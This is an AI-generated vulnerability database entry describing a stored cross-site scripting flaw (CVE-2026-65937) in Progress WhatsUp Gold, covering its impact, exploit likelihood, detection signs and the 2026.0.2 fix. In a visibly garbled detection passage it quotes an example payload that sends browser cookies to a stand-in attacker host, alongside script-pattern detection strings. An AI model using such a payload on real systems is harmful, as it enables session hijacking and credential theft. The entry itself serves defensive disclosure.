
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-65937 is a stored Cross-Site Scripting (XSS) vulnerability in Progress Software's WhatsUp Gold network monitoring software. An authenticated attacker can bypass frontend input controls and inject persistent malicious script content into the application, affecting all users who subsequently view the injected content. All WhatsUp Gold versions released before 2026.0.2 are affected; the fix was shipped in version 2026.0.2 on August 12, 2026. The vulnerability carries a CVSS v3.1 base score of 8.0 (High) (Github Advisory, Progress Release Notes).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. An authenticated attacker exploits insufficient server-side input sanitization by submitting crafted script payloads that bypass frontend validation controls; these payloads are then stored in the application and rendered to other users' browsers without proper encoding. The attack vector is Adjacent Network (AV:A), meaning the attacker must be on the same network segment or have authenticated access to the WhatsUp Gold web interface, and user interaction is required for the payload to execute in a victim's browser (Github Advisory, Progress Release Notes).
Successful exploitation enables persistent script execution in the browsers of any WhatsUp Gold user who views the injected content, resulting in high confidentiality, integrity, and availability impact per the CVSS scoring. Practical consequences include session hijacking, credential theft, unauthorized actions performed on behalf of victims, and potential lateral movement within the monitored network environment if administrator sessions are compromised. Because WhatsUp Gold is a network monitoring platform with broad visibility into infrastructure, compromise of administrator accounts could expose sensitive network topology, credentials, and device configurations (Github Advisory).
As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (Github Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.242% (16th percentile), indicating a low near-term probability of exploitation. Exploitation requires authentication and user interaction, which reduces the likelihood of opportunistic mass exploitation.
<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>).<script>, onerror=, javascript:, etc.) in input fields; repeated access to specific pages by multiple users in a short timeframe following a single authenticated write operation.<script>, <img onerror=, javascript:) in stored application data such as device names, notes, alert descriptions, or dashboard configurations when reviewed directly in the database or via API.Progress Software has released WhatsUp Gold version 2026.0.2 (released August 12, 2026), which addresses CVE-2026-65937 along with several other security issues (CVE-2026-65938, CVE-2026-65939, CVE-2026-65940, CVE-2026-65941). Organizations should upgrade to version 2026.0.2 or later as the primary remediation (Progress Release Notes). As interim measures, restrict access to the WhatsUp Gold web interface to authorized users only, enforce the principle of least privilege, and monitor application data and user activity logs for suspicious script content or unauthorized modifications (Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."